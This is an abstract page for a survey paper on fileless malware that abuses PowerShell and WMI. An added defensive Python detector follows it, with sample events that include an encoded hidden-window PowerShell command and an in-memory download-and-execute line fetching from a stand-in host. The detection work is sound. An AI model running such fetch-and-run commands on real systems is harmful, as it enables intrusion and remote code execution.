A Survey on Fileless Malware Attacks: Malware Hiding in Memory
Author(s): Maitri Amin, Raksha Shakti University, Ahmedabad; Dr. Priyanka Sharma, Raksha Shakti University, Ahmedabad
Keywords: Anti-Virus, Windows Management Instrumentation (WMI), PowerShell, Threats, Memory
Abstract
General surveys state that fileless malware is used to bypass traditional anti-virus, but the technique is not new. During the last few years, fileless malware attacks have been on the increase and, by Proofpoint's estimates, pose a higher risk to businesses than commodity malware attacks. Fileless malware attacks will overtake traditional write-to-disk attacks if they have not already. Fileless malware infects targeted computers while leaving no artefacts on the local hard drive, which makes it easy to sidestep traditional signature-based anti-virus. In this technique, attackers hide their activities in the computer's random-access memory and use native Windows tools such as PowerShell and Windows Management Instrumentation (WMI). Advanced adversaries mounting sophisticated attacks were first spotted using fileless malware several years ago, but since then there has been a steady rise in the number of attacks, according to experts. Only a small amount of code runs in the system's memory; it drives programs already present on Windows, such as PowerShell and WMI. Using these programs, attackers gain a foothold on systems to carry out a quick theft of data, or establish persistence on a system by leaving a backdoor link to a remote C&C server. Once malware is hidden in memory, it can traverse from one process to another in order to hide itself in different places. However, these attacks have one large disadvantage: when the system or the application is turned off, the memory-resident attack ends. To work around that restriction, attackers often traverse from one application to another.
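As an added, defender-side illustration that is not part of the paper, the following Python triages process-creation records for the PowerShell and WMI usage patterns the abstract describes (interpreter launched by the WMI provider host, encoded or hidden-window command lines, in-memory download-and-execute). The event records, their field names and the c2.invalid host are constructed sample data.

```python
import re

# Constructed process-creation records, loosely modelled on the fields of Windows
# Security event 4688 / Sysmon event 1. Sample data, not taken from the paper.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r"notepad.exe C:\Users\a\notes.txt"},
    {"parent": "wmiprvse.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.invalid/stage')\""},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

# Parents that should rarely launch an interpreter: the WMI provider host (WMI-driven
# execution/persistence) and Office applications (macro-driven loaders).
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_EXEC = re.compile(r"(iex|invoke-expression).*downloadstring", re.I)

def is_encoded_flag(token):
    """True for -EncodedCommand, its accepted prefixes (-e, -enc, ...) and the -ec alias."""
    t = token.lower().lstrip("-/")
    return token[:1] in "-/" and t != "" and ("encodedcommand".startswith(t) or t == "ec")

def score_event(ev):
    """Return the reasons an event looks like in-memory (fileless) PowerShell use."""
    reasons = []
    if ev["image"].lower() not in INTERPRETERS:
        return reasons
    lowered = [t.lower() for t in ev["cmdline"].split()]
    if ev["parent"].lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"{ev['parent']} spawned {ev['image']}")
    if any(is_encoded_flag(t) for t in lowered):
        reasons.append("encoded command hides the script body from simple inspection")
    if "-nop" in lowered or "-noprofile" in lowered:
        reasons.append("-NoProfile, typical of scripted rather than interactive use")
    if any(t in ("-w", "-windowstyle") for t in lowered) and "hidden" in lowered:
        reasons.append("hidden window")
    if DOWNLOAD_EXEC.search(ev["cmdline"]):
        reasons.append("download-and-execute in memory (IEX + DownloadString)")
    return reasons

def triage(events):
    """Map event index -> reasons, for every event that triggers at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := score_event(ev))}
```

Because nothing is written to disk, process-creation telemetry (command line plus parent process) is the earliest signal such a detector can key on; the rules above are deliberately narrow and should be tuned against a baseline of legitimate administrative PowerShell use.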
Other Details
Paper ID: IJSRDV5I30386
Published in: Volume 5, Issue 3
Publication Date: 01/06/2017
Page(s): 643-645